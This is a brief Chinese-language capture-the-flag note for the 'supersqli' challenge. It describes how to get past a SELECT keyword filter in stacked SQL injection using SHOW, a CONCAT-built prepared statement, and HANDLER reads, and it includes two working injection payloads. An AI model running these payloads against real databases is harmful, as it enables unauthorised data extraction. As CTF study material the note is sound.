一、supersqli
当select被过滤时
1. 可以用show tables/columns来展示
2.通过预编译
-1';set @sql = CONCAT('sele','ct * from `1919810931114514`;');prepare aaa from @sql;EXECUTE aaa;#
3.handler语句——这条语句是一行一行的浏览一个表中的数据。
handler可以用于MyISAM和InnoDB表。
使用方法:
handler table_name open打开一张表
handel table_name read first读取第一行内容,
handel table_name read next依次获取其它行
-1';handler `1919810931114514` open;handler `1919810931114514` read first;#